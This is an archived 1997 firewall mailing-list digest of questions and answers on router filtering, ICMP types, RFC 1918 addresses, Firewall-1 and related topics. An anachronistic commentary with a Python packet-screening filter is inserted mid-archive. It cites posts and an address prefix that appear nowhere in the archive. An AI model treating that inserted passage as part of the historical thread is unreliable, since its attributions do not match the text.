* From firewalls-owner Thu Jan 9 18:59:38 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA04775 for firewalls-outgoing; Thu, 9 Jan 1997 17:30:29 -0800 (PST) Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-960830-1) id RAA04710 for firewalls@greatcircle.com; Thu, 9 Jan 1997 17:30:07 -0800 (PST) Received: from mailhub1.experian.com ([192.45.129.9]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id QAA03173 for ; Wed, 8 Jan 1997 16:36:04 -0800 (PST) Received: (from uucp@localhost) by mailhub1.experian.com (8.8.4/8.8.4) id QAA19866 for ; Wed, 8 Jan 1997 16:34:55 -0800 (PST) Received: from mailsrv1.experian.com(192.45.133.1) by mailhub1.experian.com via smap (V1.3) id sma019862; Wed Jan 8 16:34:42 1997 Received: from gmills.ora.is.trw.com by mailsrv1.experian.com (SMI-8.6/SMI-SVR4) id QAA22613; Wed, 8 Jan 1997 16:35:56 -0800 Message-ID: <32D43CFC.7576@TRW.COM> Date: Wed, 08 Jan 1997 16:34:04 -0800 From: Gary Mills Reply-To: GARY.MILLS@TRW.COM Organization: Experian X-Mailer: Mozilla 3.0Gold (Win95; I) MIME-Version: 1.0 To: firewalls@GreatCircle.com Subject: RCP tcp/udp 111 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Can anyone comment on the security of rcp tcp/udp port 111. 
Regards,
Gary,
Gary Mills@experian.com

From firewalls-owner Thu Jan 9 19:00:46 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id SAA06608 for firewalls-outgoing; Thu, 9 Jan 1997 18:06:22 -0800 (PST)
Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-960830-1) id SAA06587 for firewalls@greatcircle.com; Thu, 9 Jan 1997 18:06:07 -0800 (PST)
Received: from ultra1.dreamscape.com (ultra1.dreamscape.com [206.64.128.7]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id GAA16724 for ; Thu, 9 Jan 1997 06:52:45 -0800 (PST)
Received: from bertha (sb22.dreamscape.com [206.114.183.183]) by ultra1.dreamscape.com (8.8.4/8.8.4) with SMTP id JAA01827 for ; Thu, 9 Jan 1997 09:53:21 -0500 (EST)
Message-ID: <32D5061F.2F66@dreamscape.com>
Date: Thu, 09 Jan 1997 09:52:15 -0500
From: "Steven E. Matkoski"
Reply-To: uscny8hb@ibmmail.com
Organization: Blue Cross Blue Shield of CNY
X-Mailer: Mozilla 3.0 (WinNT; I)
MIME-Version: 1.0
To: Firewalls Mailing List
Subject: registered IP addresses?
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Does someone know what the registered IP addresses are that should be used for internal networks? These are the addresses that are not routed to the Internet. Or even the RFC number?

--
Thanks!
-steve.
matkoski@dreamscape.com

From firewalls-owner Thu Jan 9 19:09:17 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id SAA06592 for firewalls-outgoing; Thu, 9 Jan 1997 18:06:08 -0800 (PST)
Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-960830-1) id SAA06559 for firewalls@greatcircle.com; Thu, 9 Jan 1997 18:05:58 -0800 (PST)
Received: from snet ([202.190.59.4]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id WAA23894 for ; Wed, 8 Jan 1997 22:30:49 -0800 (PST)
Received: from sos.dataprep.com.my by snet (SMI-8.6/SMI-SVR4) id OAA05131; Thu, 9 Jan 1997 14:38:32 -0800
Received: by sos.dataprep.com.my with Microsoft Mail id <01BBFE3C.05A4CD40@sos.dataprep.com.my>; Thu, 9 Jan 1997 14:47:22 +-800
Message-ID: <01BBFE3C.05A4CD40@sos.dataprep.com.my>
From: KENNETH PHANG
To: "'Firewall digest'"
Subject: Government and National Security
Date: Thu, 9 Jan 1997 14:47:20 +-800
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hi all,

Currently I am doing research on the Electronic Government Information System and National Security related to computer security and access, and wonder if anybody can point out where I can get more information on these issues. I would be grateful for any related URL. I would like to apologize to everybody on the list if my question is a bit off topic.

Thanks.
Cheers
Kent

From firewalls-owner Thu Jan 9 19:14:44 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA04663 for firewalls-outgoing; Thu, 9 Jan 1997 17:29:51 -0800 (PST)
Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-960830-1) id RAA04609 for firewalls@greatcircle.com; Thu, 9 Jan 1997 17:29:36 -0800 (PST)
Received: from diablo.cisco.com (diablo.cisco.com [171.68.223.106]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id PAA29144 for ; Wed, 8 Jan 1997 15:44:38 -0800 (PST)
Received: from big-dogs.cisco.com ([171.68.53.75]) by diablo.cisco.com (8.8.4/CISCO.SERVER.1.2) with SMTP id PAA19106; Wed, 8 Jan 1997 15:44:18 -0800 (PST)
Message-Id: <3.0.32.19970108184413.006bcaf4@lint.cisco.com>
X-Sender: pferguso@lint.cisco.com
X-Mailer: Windows Eudora Pro Version 3.0 (32)
Date: Wed, 08 Jan 1997 18:44:18 -0500
To: uscny8hb@ibmmail.com
From: Paul Ferguson
Subject: Re: internal filtering router - filter config?
Cc: Firewalls@GreatCircle.COM
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

At 08:40 AM 1/8/97 -0500, Steven E. Matkoski wrote:
>
>Thanks, I also read that you could block source-routed packets there,
>also.
>If I am using a cisco router, how does one go about this? or can I get a
>location for documentation.
>

Simply configure:

no ip source-route

as a global command, and Voila!

- paul

--
Paul Ferguson                     ||        ||
Consulting Engineering            ||        ||
Herndon, Virginia USA            ||||      ||||
tel: +1.703.397.5938         ..:||||||:..:||||||:..
e-mail: pferguso@cisco.com c i s c o S y s t e m s From firewalls-owner Thu Jan 9 19:29:34 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id TAA10411 for firewalls-outgoing; Thu, 9 Jan 1997 19:22:24 -0800 (PST) Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id TAA10398 for ; Thu, 9 Jan 1997 19:22:16 -0800 (PST) Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-961106) id TAA01420; Thu, 9 Jan 1997 19:21:02 -0800 Received: from dockmaster.ncsc.mil(198.26.55.74) by mycroft via smap (V1.3mjr) id sma001418; Thu Jan 9 19:20:46 1997 Date: Thu, 9 Jan 97 19:06 EST From: Wilner@DOCKMASTER.NCSC.MIL Subject: Re: Is Wilner a NET.LOON To: firewalls@GreatCircle.COM Message-ID: <970110000657.041712@DOCKMASTER.NCSC.MIL> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >Ad hominem attacks against members ... such as MJR ... That is simply rude and incorrect. I was not attacking MJR, but those who would quote pieces of his argument(s) out of context to support their own ill-conceived notions. That is all. 
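The screening-router thread above collects three separate checks that an external router should make on every inbound packet: drop source-routed packets (which is what Paul Ferguson's `no ip source-route` does globally on a Cisco), drop packets arriving from the Internet that claim one of your own internal addresses as source (Ricardo's anti-spoofing advice quoted earlier in the thread), and pass only the ICMP types you actually need (Rodrigo Ormonde's reply). The ICMP filter works on the ICMP message type field: 0 is echo reply and 8 is echo request. Two practitioner notes on that last point: destination-unreachable (type 3, especially code 4 "fragmentation needed") and time-exceeded (type 11) should normally be let in too, or Path MTU discovery and traceroute break; and ICMP redirect (type 5) should never be accepted from outside. Steven Matkoski's question about the non-routed address blocks is answered by RFC 1918: 10.0.0.0/8, 172.16.0.0/12 and 192.168.0.0/16; those are also useful to drop as inbound source addresses. The following stateless filter is an added example, not code from any post or router in this thread. The site prefix 132.244.0.0/16 is an assumption taken from Albert's post, the packets are constructed in-line, and header checksums are neither computed nor verified.

```python
"""Stateless inbound screening for an external router: source-route option
check, anti-spoofing on source address, and an ICMP type allow-list.
Added example; prefixes and packets are assumptions constructed for it."""
import ipaddress
import struct

INTERNAL_NETS = [ipaddress.ip_network("132.244.0.0/16")]   # assumed site prefix
RFC1918 = [ipaddress.ip_network(n) for n in
           ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
# ICMP types allowed in from the outside: echo reply/request for ping,
# unreachable for PMTU discovery, time-exceeded for traceroute.  Everything
# else (notably redirect, type 5) is dropped.
ICMP_PERMIT_INBOUND = {0: "echo-reply", 8: "echo-request",
                       3: "dest-unreachable", 11: "time-exceeded"}
IPOPT_LSRR, IPOPT_SSRR = 0x83, 0x89        # loose / strict source route
IPV4_HDR = "!BBHHHBBH4s4s"                 # fixed 20-byte IPv4 header


def parse_ipv4(pkt):
    """Return (src, dst, proto, options, payload); raise ValueError if malformed."""
    if len(pkt) < 20:
        raise ValueError("truncated")
    vihl, _tos, _total, _id, _frag, _ttl, proto, _csum, src, dst = \
        struct.unpack(IPV4_HDR, pkt[:20])
    if vihl >> 4 != 4:
        raise ValueError("not IPv4")
    ihl = (vihl & 0x0F) * 4
    if ihl < 20 or len(pkt) < ihl:
        raise ValueError("bad IHL")
    return (ipaddress.ip_address(src), ipaddress.ip_address(dst), proto,
            pkt[20:ihl], pkt[ihl:])


def ip_options(opts):
    """Yield the option-type byte of each IP option, walking the TLV list."""
    i = 0
    while i < len(opts):
        kind = opts[i]
        if kind == 0:              # end of option list
            return
        if kind == 1:              # NOP, single byte
            i += 1
            continue
        if i + 1 >= len(opts) or opts[i + 1] < 2:
            raise ValueError("malformed option")
        yield kind
        i += opts[i + 1]


def screen_inbound(pkt):
    """Verdict for a packet arriving on the Internet-facing interface."""
    try:
        src, _dst, proto, opts, payload = parse_ipv4(pkt)
        kinds = list(ip_options(opts))
    except ValueError as e:
        return "deny malformed: %s" % e
    if IPOPT_LSRR in kinds or IPOPT_SSRR in kinds:
        return "deny source-routed"
    if any(src in n for n in INTERNAL_NETS):
        return "deny spoofed internal source"
    if any(src in n for n in RFC1918):
        return "deny rfc1918 source"
    if proto == 1:                                   # ICMP
        if len(payload) < 8:
            return "deny malformed: short icmp"
        icmp_type = payload[0]
        if icmp_type in ICMP_PERMIT_INBOUND:
            return "permit"
        return "deny icmp type %d" % icmp_type
    return "permit"          # TCP/UDP port policy would follow here


def build_ipv4(src, dst, proto, payload, options=b""):
    """Construct a test packet (options padded to 32 bits, checksum left 0)."""
    if len(options) % 4:
        options += b"\x00" * (4 - len(options) % 4)
    ihl = 5 + len(options) // 4
    hdr = struct.pack(IPV4_HDR, (4 << 4) | ihl, 0, ihl * 4 + len(payload),
                      0, 0, 64, proto, 0,
                      ipaddress.ip_address(src).packed,
                      ipaddress.ip_address(dst).packed)
    return hdr + options + payload


def icmp(type_, code=0):
    """Minimal 8-byte ICMP header: type, code, checksum, rest-of-header."""
    return struct.pack("!BBHI", type_, code, 0, 0)


# A loose-source-route option: type, length 11, pointer 4, two hops.
LSRR_OPTION = (bytes([IPOPT_LSRR, 11, 4])
               + ipaddress.ip_address("198.51.100.9").packed
               + ipaddress.ip_address("132.244.1.1").packed)


def run_samples():
    """Verdicts for a set of constructed packets (all addresses made up)."""
    ext, inside = "198.51.100.5", "132.244.1.1"
    return {
        "ping in": screen_inbound(build_ipv4(ext, inside, 1, icmp(8))),
        "redirect in": screen_inbound(build_ipv4(ext, inside, 1, icmp(5))),
        "spoofed internal": screen_inbound(build_ipv4("132.244.9.9", inside, 6, b"\x00" * 20)),
        "rfc1918 src": screen_inbound(build_ipv4("10.1.1.1", inside, 6, b"\x00" * 20)),
        "source-routed": screen_inbound(build_ipv4(ext, inside, 6, b"\x00" * 20, LSRR_OPTION)),
        "plain tcp": screen_inbound(build_ipv4(ext, inside, 6, b"\x00" * 20)),
        "runt": screen_inbound(b"\x45\x00"),
    }


if __name__ == "__main__":
    for name, verdict in run_samples().items():
        print("%-18s %s" % (name, verdict))
```

Because the filter is stateless, permitting echo reply inbound lets anyone deliver unsolicited echo replies to your hosts; a stateful firewall only passes replies matching a request it saw leave, which is the better place for that rule if you have one.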
From firewalls-owner Thu Jan 9 19:45:02 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA04867 for firewalls-outgoing; Thu, 9 Jan 1997 17:31:00 -0800 (PST) Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-960830-1) id RAA04765 for firewalls@greatcircle.com; Thu, 9 Jan 1997 17:30:26 -0800 (PST) Received: from gate.ups.com (gate.ups.com [198.80.14.2]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id SAA10204 for ; Wed, 8 Jan 1997 18:15:24 -0800 (PST) Received: by gate.ups.com id AA24661 (InterLock SMTP Gateway 3.0 for firewalls@greatcircle.com); Wed, 8 Jan 1997 21:15:06 -0500 Received: by gate.ups.com (Protected-side Proxy Mail Agent-2); Wed, 8 Jan 1997 21:15:06 -0500 Received: by gate.ups.com (Protected-side Proxy Mail Agent-1); Wed, 8 Jan 1997 21:15:06 -0500 Date: Wed, 8 Jan 1997 21:15:02 -0500 (EST) From: Dave Wreski X-Sender: tel1dvw@butthead To: firewalls@greatcircle.com Subject: Blocking ports Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi all. I have a few questions regarding port access through a firewall. If I define source and destination IP addresses/ranges, is it necessary to define port ranges as well? I was thinking that IP spoofing might be an issue, but the best they could do would be to use a port that they are not supposed to. If I don't have any of the common services defined anyway, does it really make a difference? Does anyone know any specific references to incidents where someone accessed information they were not supposed to, under these circumstances? Thanks much, Dave Wreski ----------------------------------------------------------------------- "The opinions expressed here are my own and do not represent the views or opinions of United Parcel Service, Inc." 
-----------------------------------------------------------------------
echo '16i[q]sa[ln0=aln100%Pln100/snlbx]sb20293A2058554E494Csnlbxq'|dc

From firewalls-owner Thu Jan 9 19:57:49 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA04749 for firewalls-outgoing; Thu, 9 Jan 1997 17:30:19 -0800 (PST)
Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-960830-1) id RAA04688 for firewalls@greatcircle.com; Thu, 9 Jan 1997 17:30:00 -0800 (PST)
Received: from smartwall.v-one.com (smartwall.v-one.com [206.205.89.11]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id PAA00319 for ; Wed, 8 Jan 1997 15:58:43 -0800 (PST)
Received: by smartwall.v-one.com; id SAA01119; Wed, 8 Jan 1997 18:58:24 -0500 (EST)
Received: from nt_fs1.v-one.com(198.69.135.3) by smartwall.v-one.com via smap (V3.1.1) id xma001104; Wed, 8 Jan 97 18:58:01 -0500
Received: by nt_fs1.V-ONE.COM with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63) id <01BBFD96.1D4BCFD0@nt_fs1.V-ONE.COM>; Wed, 8 Jan 1997 18:59:46 -0500
Message-ID:
From: "McMahan, Peg"
To: "'Firewalls@GreatCircle.COM'" , "'Matthew Patton'" , "'A. Ömer Köker'"
Subject: RE: USAF: how it was hacked
Date: Wed, 8 Jan 1997 18:59:45 -0500
X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>----------
>From: A. Ömer Köker[SMTP:omer@superonline.net]
>Sent: Wednesday, January 08, 1997 7:50 AM
>To: 'Firewalls@GreatCircle.COM'; 'Matthew Patton'
>Subject: RE: USAF: how it was hacked
>
>Interestingly enough this specific hole was described in detail on the
>latest 2600mag.
>now you know they will start reading it...
>

Boy, if 2600 was talking about the phf bug in their latest issue it really says a lot as to how on top of things good old emmanuel is these days. phf was current last year. sheesh.

From firewalls-owner Thu Jan 9 20:03:07 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id SAA06570 for firewalls-outgoing; Thu, 9 Jan 1997 18:06:01 -0800 (PST)
Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-960830-1) id SAA06538 for firewalls@greatcircle.com; Thu, 9 Jan 1997 18:05:53 -0800 (PST)
Received: from snet ([202.190.59.4]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id WAA23492 for ; Wed, 8 Jan 1997 22:19:22 -0800 (PST)
Received: from palan-net.202.190.59.4 by snet (SMI-8.6/SMI-SVR4) id OAA05091; Thu, 9 Jan 1997 14:26:52 -0800
Date: Thu, 9 Jan 1997 14:26:52 -0800
Message-Id: <199701092226.OAA05091@snet>
X-Sender: palan@202.190.59.4
X-Mailer: Windows Eudora Light Version 1.5.2
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
To: firewalls@greatcircle.com, sneakers@CS.YALE.EDU
From: Kogulapalan
Subject: VLAN OVER FW-1
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

hi,

I have a question on FW-1 by Checkpoint: can Checkpoint FW-1 have full control over certain VLANs?? Say, for example, I'm putting a VLAN on my DMZ. Assume that I'm running Firewall-1 on a SunSparc (see the diagram below) and attach it to an ATM backbone using Centtilion 100 switches (Bay Networks) which provide the VLAN. Let's say I group all my sensitive servers under one VLAN and am planning to put it on the DMZ so that I can secure it from internal and external attacks...... errr, can it work?

                   10mb  +------+  155mb
  INTERNET --------------| SUN  |-----------INTERNAL NETWORK
                         | FW-1 |
                         +---+--+
                             |
                             | 10mb
                             |
                            VLAN

The machines that are grouped in this particular VLAN are scattered around the building. I need some advice on how effective this setup is, and has anyone implemented such a design?
please give me some input so that i can design a better network solution .. rgds, PaLaN From firewalls-owner Thu Jan 9 20:11:30 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA04824 for firewalls-outgoing; Thu, 9 Jan 1997 17:30:50 -0800 (PST) Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-960830-1) id RAA04753 for firewalls@greatcircle.com; Thu, 9 Jan 1997 17:30:21 -0800 (PST) Received: from mtymail.avantel-icom.com.mx ([200.33.228.147]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id RAA07660 for ; Wed, 8 Jan 1997 17:31:43 -0800 (PST) Received: by mtymail.avantel-icom.com.mx with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63) id <01BBFD9A.5A80C500@mtymail.avantel-icom.com.mx>; Wed, 8 Jan 1997 19:30:06 -0600 Message-ID: From: Ricardo Alvarado To: "Firewalls@GreatCircle.COM" Subject: RE: internal filtering router - filter config? Date: Wed, 8 Jan 1997 19:32:12 -0600 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Build an extended access list (ip access-group 1xx in) at the WAN port of your external router. You may refer to http://www.cisco.com or perform a search on "access-list" in your Cisco-CD documentation. If you use an extended access-list (Access group number above 100) you'll have more control over the packets that get across your network. With these, you can almost build a firewall right in your router, so you can get pretty good security with them. Regards… J Ricardo Alvarado B. DCN Network Provisioning v273.5767 DID 528.153.5767 SkyTel: 528.319.0779 PIN 525.4333 >---------- >From: Steven E. Matkoski[SMTP:matkoski@dreamscape.com] >Sent: Wednesday, January 08, 1997 7:40 AM >To: Firewalls@GreatCircle.COM >Subject: Re: internal filtering router - filter config? 
>
>Firewalls-Digest wrote:
>>
>> In your external router you'd block any ICMP traffic going back and
>> forth, as well as any packets bearing one of your internal IP addresses,
>> as a source address, especially if these are going INTO your protected
>> network. Also, kill telnets, fingers, snmp and snmp trap. Actually, kill
>> any ports that your users will not be using, and leave just mail, web,
>> ftp, etc.
>>
>> ricardo
>> ralvarado@avantel.com.mx
>>
>Thanks, I also read that you could block source-routed packets there,
>also.
>If I am using a cisco router, how does one go about this? or can I get a
>location for documentation.
>
>Thanks!
>-steve.
>matkoski@dreamscape.com
>

From firewalls-owner Thu Jan 9 20:14:24 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id TAA09603 for firewalls-outgoing; Thu, 9 Jan 1997 19:03:51 -0800 (PST)
Received: from panix3.panix.com (panix3.panix.com [198.7.0.4]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id TAA09594 for ; Thu, 9 Jan 1997 19:03:38 -0800 (PST)
Received: from localhost (fangyou2@localhost) by panix3.panix.com (8.8.4/8.7/PanixU1.3) with SMTP id WAA00782 for ; Thu, 9 Jan 1997 22:04:40 -0500 (EST)
Date: Thu, 9 Jan 1997 22:04:39 -0500 (EST)
From: FaNgYoU2
To: firewalls@GreatCircle.com
Subject: Notes through Firewall 1, the Dawg
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Uno. I need to set up a dumb Firewall-1 machine to permit Lotus Notes to run on an Intranet. The Notes Admin is sure that Notes can run on just a single port. What my equipment showed when I looked at Notes previously was that it made a connection on one port, a response came back on a different but very close port, some sort of handshake took place and the real data transfer started up on a third port. Is it true that Notes can be made to run on a single port through a firewall?
I say dumb Firewall-1 because if you connect to it with a GUI interface it doesn't like, it is likely to crash and come back up with all security turned off. Apparently this is a fairly well known problem. Doso. There is a bunch of spammers at Sick@Puppy.xxx.sex They have absolutely nothing to do with Sick Puppy the Cat_Eating_Dawg. Nor do they have anything to do with the Church of the Dead Meow which continued after the arrest and incarceration of Sick Puppy in Tokyo. It's kind of amusing to watch young Hack Dawgy Dawg trying to get his Dad out of Japanese jail. Anyway, the spammers are posting in various forums. Don't let them mislead you. FaNgYoU2, Cyberspace^^Vampyre ^^ Touch it, touch it, touch me ... creatures of the Night ^^ From firewalls-owner Thu Jan 9 20:26:24 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA04870 for firewalls-outgoing; Thu, 9 Jan 1997 17:31:05 -0800 (PST) Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-960830-1) id RAA04778 for firewalls@greatcircle.com; Thu, 9 Jan 1997 17:30:33 -0800 (PST) Received: from smtp2.interramp.com (smtp2.interramp.com [38.8.200.2]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id SAA10928 for ; Wed, 8 Jan 1997 18:38:10 -0800 (PST) Received: from davidh.interramp.com by smtp2.interramp.com (8.8.1/SMI-4.1.3-PSI-irsmtp) id VAA08432; Wed, 8 Jan 1997 21:28:20 -0500 (EST) Message-ID: <32D44752.C73@checkpoint.com> Date: Wed, 08 Jan 1997 19:18:10 -0600 From: David Helms Reply-To: david.helms@checkpoint.com Organization: CheckPoint Software Technologies X-Mailer: Mozilla 3.0 (Win95; I) MIME-Version: 1.0 To: firewalls@GreatCircle.COM Subject: Re: Web Site Hacking References: <199701072013.PAA27798@SPARKY.CF.CS.YALE.EDU> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Fellow listers, Just an editorial comment, please no superflames.... 
Are folks aware that FireWall-1 can be installed and configured on a machine with a single interface just as well as on a machine with multiple interfaces? This provides all the filtering, authentication, encryption and content monitoring features of any other FireWall-1 system, but oriented towards traffic in and out of that server. End of my commercial, but it provides some interesting options if you have a client that needs something like a "ServerWall" (for lack of a better term.)

Cheers,
David Helms
Check Point

long-morrow@CS.YALE.EDU wrote:
>
> >Today's Washington Post had a brief article regarding the ForceField product
> >from TIS which is apparently intended to address this issue. Unfortunately
> >you have to register to find out anything specific about the package, e.g.
> >which OS it replaces/augments. They do tell you the price however :-). I've
> >registered but the implication is that the more specific information will
> >be sent surface mail.
>
> According to the TIS Web page on Gauntlet ForceField
> ( http://www.tis.com/docs/products/gauntlet/forcefield/index.html )
> if you register they will give you a free evaluation copy of the
> software available in January.
>
> - Morrow

--
__________________________________
David Helms
Senior Technical Consultant
CheckPoint Software Technologies
ph 703.684.4824 fx 703.684.4847
davidh@checkpoint.com
__________________________________

From firewalls-owner Thu Jan 9 20:38:31 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA04890 for firewalls-outgoing; Thu, 9 Jan 1997 17:31:27 -0800 (PST)
Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-960830-1) id RAA04859 for firewalls@greatcircle.com; Thu, 9 Jan 1997 17:30:56 -0800 (PST)
Received: from mx3.io.com ([204.157.155.6]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id VAA20795 for ; Wed, 8 Jan 1997 21:22:31 -0800 (PST)
Received: from freke.ssds.com (freke.mcmurdo.gov [157.132.106.108]) by mx3.io.com (8.7.5/8.7.3) with SMTP id XAA14826; Wed, 8 Jan 1997 23:33:00 -0600
Message-Id: <3.0.32.19970109181317.0124b338@pop.io.com>
X-Sender: cds@pop.io.com
X-Mailer: Windows Eudora Pro Version 3.0 (32)
Date: Thu, 09 Jan 1997 18:21:49 +1300
To: Henry Lim Chee Wee , "Starkweather, Mike"
From: Chris Liljenstolpe
Subject: Re: Pointcast
Cc: firewalls@GreatCircle.COM
Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

At 09:46 97-01-08 +0800, the sage Henry Lim Chee Wee scribed:
>Starkweather, Mike wrote:
>>
>> I am wondering how the members of this mail list have handled the
>> flood of traffic generated by Pointcast. It has buried our firewall
>> (Tis Toolkit) with the huge number of requests it generates. Their
>> I-Server seems to help some but not as much as I had hoped.
>>
>> If this is the wrong place for this question please redirect me.
>>
>> Mike Starkweather
>> Anheuser-Busch
>
>This is not much of a firewall question, but...
>
>If you are using I-Server from PointCast, then you should
>be able to put the server directly to the firewall, downloading
>pointcast's information at regular intervals of the day. That
>will only constitute one request on the firewall per download.
>Subsequently, all of your users should download the information
>from the I-Server and NOT directly from PointCast. However,
>remember to ask your users to upgrade their pointcast client
>to version 1.1.

The last time I checked, I-server only ran on NT :(

-=Chris

>
>On the finer details, you can check it out at :
>
>http://www.pointcast.com/support/iserver/faqs/cliredir.html
>
>
>--
>   _
>  0 (_|
>  |(_~|^~~|   "I-dare-you geysering forth with
>  TT/_ T"T    heartacious good will"
> ^^^^^^^^^^^^^^nitro ^^^^^^^^^^^^^
>
> ææææææææ A Happy New Year To All !!! ææææææææ
>
> Thus end the quotation from the scroll

From firewalls-owner Thu Jan 9 20:53:02 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id SAA06597 for firewalls-outgoing; Thu, 9 Jan 1997 18:06:15 -0800 (PST) Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-960830-1) id SAA06575 for firewalls@greatcircle.com; Thu, 9 Jan 1997 18:06:03 -0800 (PST) Received: from cidexchange.infosel.com.mx (cidexchange.infosel.com.mx [148.246.8.22]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id AAA03291 for ; Thu, 9 Jan 1997 00:39:09 -0800 (PST) Received: by cidexchange.infosel.com.mx with Microsoft Exchange (IMC 4.0.837.3) id <01BBFDD5.A972B930@cidexchange.infosel.com.mx>; Thu, 9 Jan 1997 02:34:39 -0600 Message-ID: From: Jaime Alberto Botello Cantú To: "'Darren Cromer'" , "'firewalls@GreatCircle.COM'" Subject: RE: internal filtering router - filter config?
Date: Thu, 9 Jan 1997 02:34:34 -0600 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.837.3 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Darren,

You have to check the message type of the echo reply (ping reply) and the echo request. An ICMP message has a message type; for example, echo reply has message type number 0, and echo request has number 8. If you want to deny any ping from outside to your private network, you can block ICMP packets with the message type echo request (message number 8). Remember that ping is the primary tool to check if a host is up; if a hacker tries to ping your machines and your router blocks this, MAYBE he isn't going to try anything else.

See ya

>-----Original Message-----
>From: Darren Cromer [SMTP:DarrenCr@Attachmate.com]
>Sent: Martes 7 de Enero de 1997 8:42 AM
>To: 'Ricardo Alvarado'; 'firewalls@GreatCircle.COM'
>Subject: RE: internal filtering router - filter config?
>
>Why ICMP? I'm curious what inherent risk that would present.
>
>I too am setting up a screening firewall, but I want to allow pings to
>traverse the external router. (any advice on how to filter all ICMP
>except pings?)
>
>>----------
>>From: Ricardo Alvarado[SMTP:ralvarado@avantel.com.mx]
>>Sent: Friday, January 03, 1997 10:20 AM
>>To: firewalls@GreatCircle.COM
>>Subject: Re: internal filtering router - filter config?
>>
>>>What type of things would you filter on the internal router? or even
>>>the external router? I am going to be installing a firewall real soon
>>>and would really appreciate any help.
>>>
>>>-steve.
>>>matkoski@dreamscape.com
>>
>>In your external router you'd block any ICMP traffic going back and
>>forth, as well as any packets bearing one of your internal IP addresses
>>as a source address, especially if these are going INTO your protected
>>network. Also, kill telnets, fingers, snmp and snmp trap. Actually, kill
>>any ports that your users will not be using, and leave just mail, web,
>>ftp, etc.
>>
>>ricardo
>>ralvarado@avantel.com.mx
>>
>>
>

